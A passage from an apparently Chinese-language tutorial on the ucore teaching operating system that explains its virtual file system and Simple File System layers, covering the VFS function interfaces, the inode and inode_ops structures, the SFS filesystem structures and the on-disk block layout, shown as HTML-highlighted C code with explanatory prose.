class="function"><span class="type">int</span> <span class="title">vfs_symlink</span><span class="params">(<span class="type">char</span> *old_path, <span class="type">char</span> *new_path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_readlink</span><span class="params">(<span class="type">char</span> *path, <span class="keyword">struct</span> iobuf *iob)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_mkdir</span><span class="params">(<span class="type">char</span> *path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_unlink</span><span class="params">(<span class="type">char</span> *path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_rename</span><span class="params">(<span class="type">char</span> *old_path, <span class="type">char</span> *new_path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_chdir</span><span class="params">(<span class="type">char</span> *path)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_getcwd</span><span class="params">(<span class="keyword">struct</span> iobuf *iob)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * VFS layer mid-level operations.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_lookup     - Like VOP_LOOKUP, but takes a full device:path name,</span></span><br><span class="line"><span class="comment"> *                     or a name relative to the current directory, and</span></span><br><span class="line"><span class="comment"> *                     goes to the correct filesystem.</span></span><br><span class="line"><span class="comment"> *    vfs_lookparent - Likewise, for VOP_LOOKPARENT.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Both of these may destroy the path passed in.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_lookup</span><span class="params">(<span class="type">char</span> *path, <span class="keyword">struct</span> inode **node_store)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_lookup_parent</span><span class="params">(<span class="type">char</span> *path, <span class="keyword">struct</span> inode **node_store, <span class="type">char</span> **endp)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Misc</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_set_bootfs - Set the filesystem that paths beginning with a</span></span><br><span class="line"><span class="comment"> *                    slash are sent to. If not set, these paths fail</span></span><br><span class="line"><span class="comment"> *                    with ENOENT. The argument should be the device</span></span><br><span class="line"><span class="comment"> *                    name or volume name for the filesystem (such as</span></span><br><span class="line"><span class="comment"> *                    &quot;lhd0:&quot;) but need not have the trailing colon.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_get_bootfs - return the inode of the bootfs filesystem.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_add_fs     - Add a hardwired filesystem to the VFS named device</span></span><br><span class="line"><span class="comment"> *                    list. It will be accessible as &quot;devname:&quot;. This is</span></span><br><span class="line"><span class="comment"> *                    intended for filesystem-devices like emufs, and</span></span><br><span class="line"><span class="comment"> *                    gizmos like Linux procfs or BSD kernfs, not for</span></span><br><span class="line"><span class="comment"> *                    mounting filesystems on disk devices.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_add_dev    - Add a device to the VFS named device list. If</span></span><br><span class="line"><span class="comment"> *                    MOUNTABLE is zero, the device will be accessible</span></span><br><span class="line"><span class="comment"> *                    as &quot;DEVNAME:&quot;. If the mountable flag is set, the</span></span><br><span class="line"><span class="comment"> *                    device will be accessible as &quot;DEVNAMEraw:&quot; and</span></span><br><span class="line"><span class="comment"> *                    mountable under the name &quot;DEVNAME&quot;. Thus, the</span></span><br><span class="line"><span class="comment"> *                    console, added with MOUNTABLE not set, would be</span></span><br><span class="line"><span class="comment"> *                    accessed by pathname as &quot;con:&quot;, and lhd0, added</span></span><br><span class="line"><span class="comment"> *                    with mountable set, would be accessed by</span></span><br><span class="line"><span class="comment"> *                    pathname as &quot;lhd0raw:&quot; and mounted by passing</span></span><br><span class="line"><span class="comment"> *                    &quot;lhd0&quot; to vfs_mount.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_mount      - Attempt to mount a filesystem on a device. The</span></span><br><span class="line"><span class="comment"> *                    device named by DEVNAME will be looked up and</span></span><br><span class="line"><span class="comment"> *                    passed, along with DATA, to the supplied function</span></span><br><span class="line"><span class="comment"> *                    MOUNTFUNC, which should create a struct fs and</span></span><br><span class="line"><span class="comment"> *                    return it in RESULT.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_unmount    - Unmount the filesystem presently mounted on the</span></span><br><span class="line"><span class="comment"> *                    specified device.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *    vfs_unmountall - Unmount all mounted filesystems.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_set_bootfs</span><span class="params">(<span class="type">char</span> *fsname)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_get_bootfs</span><span class="params">(<span class="keyword">struct</span> inode **node_store)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_add_fs</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname, <span class="keyword">struct</span> fs *fs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_add_dev</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname, <span class="keyword">struct</span> inode *devnode, <span class="type">bool</span> mountable)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_mount</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname, <span class="type">int</span> (*mountfunc)(<span class="keyword">struct</span> device *dev, <span class="keyword">struct</span> fs **fs_store))</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_unmount</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">vfs_unmount_all</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// vfs中更为底层的函数</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">inode_ops</span> &#123;</span><br><span class="line">    <span class="type">unsigned</span> <span class="type">long</span> vop_magic;</span><br><span class="line">    <span class="built_in">int</span> (*vop_open)(<span class="keyword">struct</span> inode *node, <span class="type">uint32_t</span> open_flags);</span><br><span class="line">    <span class="built_in">int</span> (*vop_close)(<span class="keyword">struct</span> inode *node);</span><br><span class="line">    <span class="built_in">int</span> (*vop_read)(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> iobuf *iob);</span><br><span class="line">    <span class="built_in">int</span> (*vop_write)(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> iobuf *iob);</span><br><span class="line">    <span class="built_in">int</span> (*vop_fstat)(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> stat *stat);</span><br><span class="line">    <span class="built_in">int</span> (*vop_fsync)(<span class="keyword">struct</span> inode *node);</span><br><span class="line">    <span class="built_in">int</span> (*vop_namefile)(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> iobuf *iob);</span><br><span class="line">    <span class="built_in">int</span> (*vop_getdirentry)(<span class="keyword">struct</span> inode *node, <span class="keyword">struct</span> iobuf *iob);</span><br><span class="line">    <span class="built_in">int</span> (*vop_reclaim)(<span class="keyword">struct</span> inode *node);</span><br><span class="line">    <span class="built_in">int</span> (*vop_gettype)(<span class="keyword">struct</span> inode *node, <span class="type">uint32_t</span> *type_store);</span><br><span class="line">    <span class="built_in">int</span> (*vop_tryseek)(<span class="keyword">struct</span> inode *node, <span class="type">off_t</span> pos);</span><br><span class="line">    <span class="built_in">int</span> (*vop_truncate)(<span class="keyword">struct</span> inode *node, <span class="type">off_t</span> len);</span><br><span class="line">    <span class="built_in">int</span> (*vop_create)(<span class="keyword">struct</span> inode *node, <span class="type">const</span> <span class="type">char</span> *name, <span class="type">bool</span> excl, <span class="keyword">struct</span> inode **node_store);</span><br><span class="line">    <span class="built_in">int</span> (*vop_lookup)(<span class="keyword">struct</span> inode *node, <span class="type">char</span> *path, <span class="keyword">struct</span> inode **node_store);</span><br><span class="line">    <span class="built_in">int</span> (*vop_ioctl)(<span class="keyword">struct</span> inode *node, <span class="type">int</span> op, <span class="type">void</span> *data);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><h6 id="inode接口">inode接口</h6><p><code>vfs</code>会涉及到<code>inode</code>结构的操作，该结构是位于内存的索引节点，它是VFS结构中的重要数据结构，因为它实际负责把不同文件系统的特定索引节点信息（甚至不能算是一个索引节点）统一封装起来，避免了进程直接访问具体文件系统。其定义如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * A struct inode is an abstract representation of a file.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * It is an interface that allows the kernel&#x27;s filesystem-independent</span></span><br><span class="line"><span class="comment"> * code to interact usefully with multiple sets of filesystem code.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Abstract low-level file.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Note: in_info is Filesystem-specific data, in_type is the inode type</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * open_count is managed using VOP_INCOPEN and VOP_DECOPEN by</span></span><br><span class="line"><span class="comment"> * vfs_open() and vfs_close(). Code above the VFS layer should not</span></span><br><span class="line"><span class="comment"> * need to worry about it.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">inode</span> &#123;</span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="comment">// 设备结点</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">device</span> __device_info;</span><br><span class="line">        <span class="comment">// 对应文件系统中，文件/目录的实际节点</span></span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">sfs_inode</span> __sfs_inode_info;</span><br><span class="line">    &#125; in_info;</span><br><span class="line">    <span class="keyword">enum</span> &#123;</span><br><span class="line">        inode_type_device_info = <span class="number">0x1234</span>,</span><br><span class="line">        inode_type_sfs_inode_info,</span><br><span class="line">    &#125; in_type;</span><br><span class="line">    <span class="type">int</span> ref_count;</span><br><span class="line">    <span class="type">int</span> open_count;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">fs</span> *in_fs;</span><br><span class="line">    <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">inode_ops</span> *in_ops;</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p><code>struct inode</code>中存放了<code>info</code>、类型<code>type</code>、引用次数<code>ref_count</code>、打开次数<code>open_count</code>、相关联的文件系统<code>in_fs</code>以及当前结构所对应的操作集合<code>in_ops</code>。该结构与硬盘上对应区域相关联，从而便于对硬盘进行操作。</p><p><code>inode_ops</code>成员是对常规文件、目录、设备文件所有操作的一个抽象函数表示。对于某一具体的文件系统中的文件或目录，只需实现相关的函数，就可以被用户进程访问具体的文件了，且用户进程无需了解具体文件系统的实现细节。可选实现如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Function table for device inodes.</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="comment">// The sfs specific DIR operations correspond to the abstract operations on a inode.</span></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">inode_ops</span> sfs_node_dirops = &#123;</span><br><span class="line">    .vop_magic                      = VOP_MAGIC,</span><br><span class="line">    .vop_open                       = sfs_opendir,</span><br><span class="line">    .vop_close                      = sfs_close,</span><br><span class="line">    .vop_fstat                      = sfs_fstat,</span><br><span class="line">    .vop_fsync                      = sfs_fsync,</span><br><span class="line">    .vop_namefile                   = sfs_namefile,</span><br><span class="line">    .vop_getdirentry                = sfs_getdirentry,</span><br><span class="line">    .vop_reclaim                    = sfs_reclaim,</span><br><span class="line">    .vop_gettype                    = sfs_gettype,</span><br><span class="line">    .vop_lookup                     = sfs_lookup,</span><br><span class="line">&#125;;</span><br><span class="line"><span class="comment">/// The sfs specific FILE operations correspond to the abstract operations on a inode.</span></span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">inode_ops</span> sfs_node_fileops = &#123;</span><br><span class="line">    .vop_magic                      = VOP_MAGIC,</span><br><span class="line">    .vop_open                       = sfs_openfile,</span><br><span class="line">    .vop_close                      = sfs_close,</span><br><span class="line">    .vop_read                       = sfs_read,</span><br><span class="line">    .vop_write                      = sfs_write,</span><br><span class="line">    .vop_fstat                      = sfs_fstat,</span><br><span class="line">    .vop_fsync                      = sfs_fsync,</span><br><span class="line">    .vop_reclaim                    = sfs_reclaim,</span><br><span class="line">    .vop_gettype                    = sfs_gettype,</span><br><span class="line">    .vop_tryseek                    = sfs_tryseek,</span><br><span class="line">    .vop_truncate                   = sfs_truncfile,</span><br><span class="line">&#125;;</span><br><span class="line"><span class="type">static</span> <span class="type">const</span> <span class="keyword">struct</span> <span class="title class_">inode_ops</span> dev_node_ops = &#123;</span><br><span class="line">    .vop_magic                      = VOP_MAGIC,</span><br><span class="line">    .vop_open                       = dev_open,</span><br><span class="line">    .vop_close                      = dev_close,</span><br><span class="line">    .vop_read                       = dev_read,</span><br><span class="line">    .vop_write                      = dev_write,</span><br><span class="line">    .vop_fstat                      = dev_fstat,</span><br><span class="line">    .vop_ioctl                      = dev_ioctl,</span><br><span class="line">    .vop_gettype                    = dev_gettype,</span><br><span class="line">    .vop_tryseek                    = dev_tryseek,</span><br><span class="line">    .vop_lookup                     = dev_lookup,</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p><code>inode</code>结构是与文件系统相关的，不同文件系统所实现的<code>inode</code>结构是不同的，它的存在可以让VFS忽略更下一级的文件系统差异，使之注重于提供一个统一的文件系统接口。<code>inode</code>根据其<code>in_info</code>的不同而实现其不同的功能。</p><blockquote><p>文件系统抽象层VFS提供了file接口、dir接口、inode接口、fs接口以及外设接口。而这些接口在<code>sfs</code>中被具体实现。</p></blockquote><h5 id="3-Simple-FS-文件系统层-SFS">3) Simple FS 文件系统层(SFS)</h5><h6 id="概述">概述</h6><p>从<code>VFS</code>向下一层，就是<code>SFS</code>。</p><p>ucore内核把所有文件都看作是字节流，任何内部逻辑结构都是专用的，由应用程序负责解释。但是ucore区分文件的物理结构。ucore目前支持如下几种类型的文件：</p><ul><li>常规文件：文件中包括的内容信息是由应用程序输入。SFS文件系统在普通文件上不强加任何内部结构，把其文件内容信息看作为字节。</li><li>目录：包含一系列的entry，每个entry包含文件名和指向与之相关联的索引节点（index node）的指针。目录是按层次结构组织的。</li><li>链接文件：实际上一个链接文件是一个已经存在的文件的另一个可选择的文件名。</li><li>设备文件：不包含数据，但是提供了一个映射物理设备（如串口、键盘等）到一个文件名的机制。可通过设备文件访问外围设备。</li><li>管道：管道是进程间通讯的一个基础设施。管道缓存了其输入端所接受的数据，以便在管道输出端读的进程能一个先进先出的方式来接受数据。</li></ul><p>SFS文件系统中目录和常规文件具有共同的属性，而这些属性保存在索引节点中。SFS通过索引节点来管理目录和常规文件，索引节点包含操作系统所需要的关于某个文件的关键信息，比如文件的属性、访问许可权以及其它控制信息都保存在索引节点中。可以有多个文件名可指向一个索引节点。</p><h6 id="函数接口与数据结构">函数接口与数据结构</h6><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">sfs_init</span><span class="params">(<span class="type">void</span>)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_mount</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *devname)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">lock_sfs_fs</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">lock_sfs_io</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">unlock_sfs_fs</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">void</span> <span class="title">unlock_sfs_io</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_rblock</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">uint32_t</span> blkno, <span class="type">uint32_t</span> nblks)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_wblock</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">uint32_t</span> blkno, <span class="type">uint32_t</span> nblks)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_rbuf</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">size_t</span> len, <span class="type">uint32_t</span> blkno, <span class="type">off_t</span> offset)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_wbuf</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">void</span> *buf, <span class="type">size_t</span> len, <span class="type">uint32_t</span> blkno, <span class="type">off_t</span> offset)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_sync_super</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_sync_freemap</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_clear_block</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="type">uint32_t</span> blkno, <span class="type">uint32_t</span> nblks)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">sfs_load_inode</span><span class="params">(<span class="keyword">struct</span> sfs_fs *sfs, <span class="keyword">struct</span> inode **node_store, <span class="type">uint32_t</span> ino)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">sfs_sync</span><span class="params">(<span class="keyword">struct</span> fs *fs)</span></span>;</span><br><span class="line"><span class="type">static</span> <span class="keyword">struct</span> <span class="title class_">inode</span>* <span class="built_in">sfs_get_root</span>(<span class="keyword">struct</span> fs *fs) ;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">sfs_unmount</span><span class="params">(<span class="keyword">struct</span> fs *fs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span> <span class="title">sfs_cleanup</span><span class="params">(<span class="keyword">struct</span> fs *fs)</span></span>;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">fs_init_read</span><span class="params">(<span class="keyword">struct</span> device *dev, <span class="type">uint32_t</span> blkno, <span class="type">void</span> *blk_buffer)</span></span>;</span><br><span class="line"><span class="function"><span class="type">static</span> <span class="type">int</span> <span class="title">fs_do_mount</span><span class="params">(<span class="keyword">struct</span> device *dev, <span class="keyword">struct</span> fs **fs_store)</span></span>;</span><br><span class="line"><span class="comment">// ......</span></span><br></pre></td></tr></table></figure><p>在<code>SFS</code>中涉及到了两种文件系统结构，分别是<code>fs</code>和<code>sfs_fs</code>。<code>fs</code>结构是我们在上层函数调用中所直接操作的抽象文件系统，而<code>sfs_fs</code>则是在下层函数中所使用的。在原先<code>sfs_fs</code>上抽象出一层<code>fs</code>结构有助于忽略不同文件系统的差异。其实现如下所示</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * Abstract filesystem. (Or device accessible as a file.)</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * Information:</span></span><br><span class="line"><span class="comment"> *      fs_info   : filesystem-specific data (sfs_fs)</span></span><br><span class="line"><span class="comment"> *      fs_type   : filesystem type</span></span><br><span class="line"><span class="comment"> * Operations:</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *      fs_sync       - Flush all dirty buffers to disk.</span></span><br><span class="line"><span class="comment"> *      fs_get_root   - Return root inode of filesystem.</span></span><br><span class="line"><span class="comment"> *      fs_unmount    - Attempt unmount of filesystem.</span></span><br><span class="line"><span class="comment"> *      fs_cleanup    - Cleanup of filesystem.???</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * fs_get_root should increment the refcount of the inode returned.</span></span><br><span class="line"><span class="comment"> * It should not ever return NULL.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * If fs_unmount returns an error, the filesystem stays mounted, and</span></span><br><span class="line"><span class="comment"> * consequently the struct fs instance should remain valid. On success,</span></span><br><span class="line"><span class="comment"> * however, the filesystem object and all storage associated with the</span></span><br><span class="line"><span class="comment"> * filesystem should have been discarded/released.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">fs</span> &#123;</span><br><span class="line">    <span class="keyword">union</span> &#123;</span><br><span class="line">        <span class="keyword">struct</span> <span class="title class_">sfs_fs</span> __sfs_info;</span><br><span class="line">    &#125; fs_info;                                     <span class="comment">// filesystem-specific data</span></span><br><span class="line">    <span class="keyword">enum</span> &#123;</span><br><span class="line">        fs_type_sfs_info,</span><br><span class="line">    &#125; fs_type;                                     <span class="comment">// filesystem type</span></span><br><span class="line">    <span class="built_in">int</span> (*fs_sync)(<span class="keyword">struct</span> fs *fs);                 <span class="comment">// Flush all dirty buffers to disk</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">inode</span> *(*fs_get_root)(<span class="keyword">struct</span> fs *fs);   <span class="comment">// Return root inode of filesystem.</span></span><br><span class="line">    <span class="built_in">int</span> (*fs_unmount)(<span class="keyword">struct</span> fs *fs);              <span class="comment">// Attempt unmount of filesystem.</span></span><br><span class="line">    <span class="built_in">void</span> (*fs_cleanup)(<span class="keyword">struct</span> fs *fs);             <span class="comment">// Cleanup of filesystem.???</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">/* filesystem for sfs */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_fs</span> &#123;</span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">sfs_super</span> super;                         <span class="comment">/* on-disk superblock */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">device</span> *dev;                             <span class="comment">/* device mounted on */</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">bitmap</span> *freemap;                         <span class="comment">/* blocks in use are mared 0 */</span></span><br><span class="line">    <span class="type">bool</span> super_dirty;                               <span class="comment">/* true if super/freemap modified */</span></span><br><span class="line">    <span class="type">void</span> *sfs_buffer;                               <span class="comment">/* buffer for non-block aligned io */</span></span><br><span class="line">    <span class="type">semaphore_t</span> fs_sem;                             <span class="comment">/* semaphore for fs */</span></span><br><span class="line">    <span class="type">semaphore_t</span> io_sem;                             <span class="comment">/* semaphore for io */</span></span><br><span class="line">    <span class="type">semaphore_t</span> mutex_sem;                          <span class="comment">/* semaphore for link/unlink and rename */</span></span><br><span class="line">    <span class="type">list_entry_t</span> inode_list;                        <span class="comment">/* inode linked-list */</span></span><br><span class="line">    <span class="type">list_entry_t</span> *hash_list;                        <span class="comment">/* inode hash linked-list */</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure><p><code>sfs_fs</code>结构中包含了底层设备的超级块<code>superblock</code>、所挂载的设备<code>dev</code>、以及底层设备中用于表示空间分配情况的<code>freemap</code>等。</p><h6 id="文件系统布局">文件系统布局</h6><p>文件系统通常保存在磁盘上。在本实验中，第三个磁盘（即disk0，前两个磁盘分别是 ucore.img 和 swap.img）用于存放一个SFS文件系统（Simple Filesystem）。通常文件系统中，磁盘的使用是以扇区（Sector）为单位的，但是为了实现简便，SFS 中以 block （4K，与内存 page 大小相等）为基本单位。</p><p>SFS文件系统的布局如下</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">+------------+----------+---------+-------------------------------------+</span><br><span class="line">| superblock | root-dir | freemap | Inode / File Data / Dir Data blocks |</span><br><span class="line">+------------+----------+---------+-------------------------------------+</span><br></pre></td></tr></table></figure><ul><li><p>第0个块（4K）是超级块（superblock），它包含了关于文件系统的所有关键参数，当计算机被启动或文件系统被首次接触时，超级块的内容就会被装入内存。其定义如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> * On-disk superblock</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">sfs_super</span> &#123;</span><br><span class="line">    <span class="comment">// 超级块结构中包含成员变量魔数magic，内核通过它来检查磁盘镜像是否是合法的 SFS img</span></span><br><span class="line">    <span class="type">uint32_t</span> magic;                                 <span class="comment">/* magic number, should be SFS_MAGIC */</span></span><br><span class="line">    <span class="type">uint32_t</span> blocks;                                <span class="comment">/* # of blocks in fs */</span></span><br><span class="line">    <span class="type">uint32_t</span> unused_blocks;                         <span class="comment">/* # of unused blocks in fs */</span></span><br><span class="line">    <span class="type">char</span> 